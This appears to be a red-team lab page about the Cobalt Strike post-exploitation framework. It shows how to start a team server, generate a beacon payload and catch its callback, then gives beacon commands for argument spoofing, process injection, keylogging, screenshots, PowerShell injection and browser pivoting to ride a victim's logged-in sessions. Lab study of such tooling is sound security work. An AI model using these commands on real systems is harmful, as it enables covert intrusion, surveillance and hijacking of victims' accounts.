Cobalt Strike 101
This lab is for exploring the advanced penetration testing / post-exploitation tool Cobalt Strike.

Definitions

    Listener - a service running on the attacker's C2 server that is listening for beacon callbacks
    Beacon - a malicious agent / implant on a compromised system that calls back to the attacker controlled system and checks for any new commands that should be executed on the compromised system
    Team server - Cobalt Strike's server component. Team server is where listeners for beacons are configured and stood up.

Getting Started

Team Server

1
# the syntax is ./teamserver <serverIP> <password> <~killdate> <~profile>
2
# ~ optional for now
3
[email protected]/opt/cobaltstrike# ./teamserver 10.0.0.5 password
Copied!
Note that in real life red team engagements, you would put the team servers behind redirectors to add resilience to your attacking infrastructure. See Red Team Infrastructure

Cobalt Strike Client

1
[email protected]/opt/cobaltstrike# ./cobaltstrike
Copied!
Enter the following:
    host - team server IP or DNS name
    user - anything you like - it's just a nickname
    password - your team server password

Demo

All of the above steps are shown below in one animated gif:

Setting Up Listener

Give your listener a descriptive name and a port number the team server should bind to and listen on:

Generating a Stageless Payload

Generate a stageless (self-contained exe) beacon - choose the listener your payload will connect back to and payload architecture and you are done:

Receiving First Call Back

On the left is a victim machine, executing the previously generated beacon - and on the left is a cobalt strike client connected to the teamserver catching the beacon callback:

Interacting with Beacon

Right click the beacon and select interact. Note the new tab opening at the bottom of the page that allows an attacker issuing commdands to the beacon:

Interesting Commands & Features

Argue

Argue command allows the attacker to spoof commandline arguments of the process being launched.
The below spoofs calc command line parameters:
1
beacon> argue calc /spoofed
2
beacon> run calc
Copied!
Note the differences in commandline parameters captured in sysmon vs procexp:
Argument spoofing is done via manipulating memory structures in Process Environment Block which I have some notes about:

Inject

Inject is very similar to metasploit's migrate function and allows an attacker to duplicate their beacon into another process on the victim system:
1
beacon> help inject
2
Use: inject [pid] <x86|x64> [listener]
3
4
inject 776 x64 httplistener
Copied!
Note how after injecting the beacon to PID 776, another session is spawned:

Keylogger

1
beacon> keylogger 1736 x64
Copied!

Screenshot

1
beacon> screenshot 1736 x64
Copied!

Runu

Runu allows us launching a new process from a specified parent process:
1
runu 2316 calc
Copied!

Psinject

This function allows an attacker executing powershell scripts from under any process on the victim system. Note that PID 2872 is the calc.exe process seen in the above screenshot related to runu:
1
beacon> psinject 2872 x64 get-childitem c:\
Copied!
Highlighted in green are new handles that are opened in the target process when powershell script is being injected:

Spawnu

Spawn a session with powershell payload from a given parent PID:
1
beacon> spawnu 3848 httplistener
Copied!

Browser Pivoting

This feature enables an attacker riding on compromised user's browsing sessions.
The way this attack works is best explained with an example:
    Victim log's in to some web application using Internet Explorer.
    Attacker/operator creates a browser pivot by issuing a browserpivot command
    The beacon creates a proxy server on the victim system (in Internet Explorer process to be more precise) by binding and listening to a port, say 6605
    Team server binds and starts listening to a port, say 33912
    Attacker can now use their teamserver:33912 as a web proxy. All the traffic that goes through this proxy will be forwarded/traverse the proxy opened on the victim system via the Internet Explorer process (port 6605). Since Internet Explorer relies on WinINet library for managing web requests and authentication, attacker's web requests will be reauthenticated allowing the attacker to view same applications the victim has active sessions to without being asked to login.
Browser pivotting in cobalt strike:
1
beacon> browserpivot 244 x86
Copied!
Note how the iexplore.exe opened up port 6605 for listening as mentioned earlier:
The below illustrates the attack visually. On the left - a victim system logged to some application and on the right - attacker id trying to access the same application and gets presented with a login screen since they are not authenticated:
The story changes if the attacker starts proxying his web traffic through the victim proxy 10.0.0.5:33912:

System Profiler

A nice feature that profiles potential victims by gathering information on what software / plugins victim system has installed:
Once the the profilder URL is visited, findings are presented in the Application view:
Event logs will show how many times the profiler has been used by victims:

References

Last modified 2yr ago